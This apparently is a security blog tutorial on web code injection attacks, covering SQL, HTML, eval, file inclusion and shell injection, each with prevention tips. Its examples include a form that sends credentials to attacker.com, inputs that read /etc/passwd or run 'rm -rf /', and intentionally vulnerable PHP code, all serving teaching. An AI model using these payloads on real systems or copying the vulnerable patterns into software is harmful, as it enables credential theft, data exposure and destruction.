If not redirected, please click here https://www.thesecuritybuddy.com/vulnerabilities/what-is-code-injection-attack/
A Code Injection
Attack is an attack in which the attacker exploits security
vulnerabilities in the web application and introduces or injects code
to change the course of execution.
A web application
becomes vulnerable to Code Injection Attacks mainly when user data is
sent to the interpreter without proper validation.
There are mainly a few
common types of Code Injection Attacks :
- SQL Injection Attacks
- HTML Script Injection Attacks
- Dynamic Code Evaluation Attacks
- File Inclusion Attacks
- Shell Injection or Command Injection Attacks
This type of attacks
are mainly found in SQL, LDAP, XPATH, NoSQL, OS commands, XML
Parsers, SMTP Headers etc. Let's look into some examples to
understand these attacks better.
SQL Injection Attacks
In this type of Code Injection Attacks,
attackers
exploit the security vulnerabilities in the application software and
tricks the server to execute malicious SQL queries, thus deleting or
changing the database or stealing sensitive data to perform even more
attacks.
Example
: Suppose, username and
corresponding sensitive data are stored in a database. A registered
user, provides username and corresponding data is displayed in his
webpage. For that, the server takes the username and executes the
following SQL query in the database :
SELECT
* FROM users WHERE name = ' ” + userName + “ ' ; “
where
userName is the username is taken as input from the user, may be
through a form.
At
this point, the attacker can input,
'
OR '1'='1
And,
if proper care is not taken while writing the code, the server will
execute the following query :
SELECT
* FROM users WHERE name = ' ' OR '1'='1';
As
a result, sensitive data of all the users will be revealed to him.
Preventive
Measures :
There
are couple of precautions we can take to mitigate this attack.
-
User input should not be embedded in the query directly. Instead,
parameterized statements that work with parameters should be used.
-
Type constraints of variables should be properly checked before
executing the query.
-
For parameterized statements, parameters should be escaped properly.
For example, in PHP mysqli_real_escape_string() can be used to escape
parameters.
-
Certain characters can even be forbidden to be used in the query.
-
Database permissions should be limited appropriately. Some tables can
be restricted to be fetched without appropriate permissions.
-
Bin2hex() and unhex() can be used to convert the parameters to/from
hex values. The advantage of this is, the output of unhex() function
is returned as a string and not interpreted.
HTML Script Injection Attacks
HTML Injection Attack is an attack through which an attacker takes advantage of security vulnerability of a web application and injects his own HTML contents into the webpage, thus tricking the user to provide sensitive information.
Example
: Let's assume, a web
application has security vulnerability and it has implemented the
following piece of PHP code :
<?php
$name = $_REQUEST
['name'];
?>
<html>
Welcome <?php
echo $name ?>!!
</html>
Clearly,
this code has vulnerability via the name parameter.
Suppose,
an attacker comes to know about the vulnerability and he wants to
steal an authenticated user's username and password.
So,
he uses soe form of social engineering and sends a victim the
following link :
/vulnerable.php?name=<h1>Please
enter your username and password</h1><form method=”POST”
action=”http://attacker.com/login.php”>Username:<input
type=”text” name=”username” /> <br><Password:<input
type=”password” name=”password” /><input type=”submit”
value=”Login” /></form><!--
The
attacker may also convert the ASCII characters to hexadecimal so that
the link is not human readable.
The
attacker may send this link to the victim through an email attachment
saying some new features in the website.
The
victim clicks on the link and it asks for username and password.
When
the victim provides his username and password, the data directly goes
to the attacker.
The
attacker can now impersonate the victim and login to the victim's
account with his login information.
Preventive Measures :
Yes,
we can take a couple of steps to prevent this attack.
- Never insert untrusted data excepting some allowable locations.
- Use HTML Escape before inserting untrusted data into HTML element content
- Use Attribute escape before inserting untrusted data into HTML common attributes
- Use JavaScript escape before inserting untrusted data into JavaScript data values.
- HTML escape JSON values in an HTML context and read the data with JSON.parse
- Use CSS escape and strictly validate data before inserting the untrusted data into HTML style property values
- Use URL escape before inserting untrusted data into HTML URL parameter values
- Sanitize HTML markup with a proper library
- Use HTTPOnly cookie flag
- Implement content security policy.
Dynamic Code Evaluation Attacks
A
Dynamic Code Evaluation attack is
an attack, in which all or part of the input string of eval()
function in PHP gets maliciously controlled by the attacker.
Example : For example, let's consider this piece of code :
<?php
$name = 'Adam';
$string =
$_GET['arg'];
eval("\$name =
\"$string\";");
?>
Here,
$string is an input taken from a user and then, the value is assigned
to $name.
But,
suppose an attacker gives as input 'noname ; system(“ls”)'.
Then,
$string will be assigned 'noname; system(“ls”)' and inside the
eval() function 'ls' will get called, revealing the list of files in
the directory. The attacker may even update, delete or see sensitive
files in the server using this vulnerability. And, this is how a
Dynamic Code Evaluation attack is perpetrated.
Preventive
Measures : We can avoid the
usage of eval() as far as possible. The usage of eval() is actually
normally discouraged. Try to implement the functionality with some
other function.
But,
if you think, you must use eval(), then make sure user provided
inputs are not directly used as input of eval() function. Instead, we
should process the input string and discard suspicious characters
carefully and then use it.
File Inclusion Attacks
In File
Inclusion Attack, an attacker
tricks a web server to execute certain scripts and include a
sensitive file from the server or malicious file remotely to the
server with the purpose of performing even more attacks.
Example :
Let's
consider this piece of code :
<?php
if ( isset(
$GET['EYES'] ) ) {
include(
$_GET['EYES'] . '.php' );
}
?>
<form method="get"> <select name="EYES"> <option value="black">Black</option> <option value="blue">Blue</option> </select> <input type="submit"> </form>
Here,
if the attacker executes /eyes.php?EYES=/etc/passwd that will allow
the attacker to read the content of file /etc/passwd from the web
server. This may lead to theft of sensitive data or even more attacks
later. This is a typical example of Local File Inclusion
Attack.
Or
the attacker may execute
/eyes.php?EYES=http://attacker.com/malicious.txt?
And that will inject a malicious file in the web server, resulting in
Remote
File Injection Attack.
Preventive
Measures :
We
can follow some coding practices which will reduce this
vulnerabilities to a large extent.
- When a passed-in path is included, make sure it does not contain unintended character patterns.
- Instead of dynamically generating the path from the URL or form parameter, you can use a predefined switch/case statement to determine which file should be included.
Shell Injection Attacks
A
Shell
Injection
or Command
Injection Attack is
an attack in which an attacker takes advantage of vulnerability of a
web application and executes arbitrary command in the server for
malicious activities.
Example
:
Let's
understand this with an example.
Suppose,
a web application takes name of a file as input from a user and
displays it contents. And, the web application has implemented that
with the following piece of PHP code :
<?php
print(Please
specify the name of the file ) ;
$file =
$_GET['filename'] ;
system(“cat
$file”) ;
?>
So,
if a user gives an input 'profile.txt', corresponding file will be
displayed.
But,
suppose an attacker gives an input 'profile.txt ; ls ;'. It will list
all files in the directory where profile.txt is kept.
Or
even worse, the attacker can give input 'profile.txt; rm -rf /;”
and this will delete all files in the root directory.
Preventive
Measures :
We
can take a couple of steps to prevent this attack.
- Carefully sanitize all user input data in the web application.
- Strip certain characters like ';', '&', '|' etc from user input data.
- Limit the length of user input data.
- Check the validity of user input data type.
- It is always advisable to include filtering functions before executing the command. In PHP, escapeshellarg, escapeshellcmd may solve the purpose.
So,
beware of various vulnerabilities of web applications, so that you
can protect your web server in a better way. And, stay safe, stay
secured.
No comments:
Post a Comment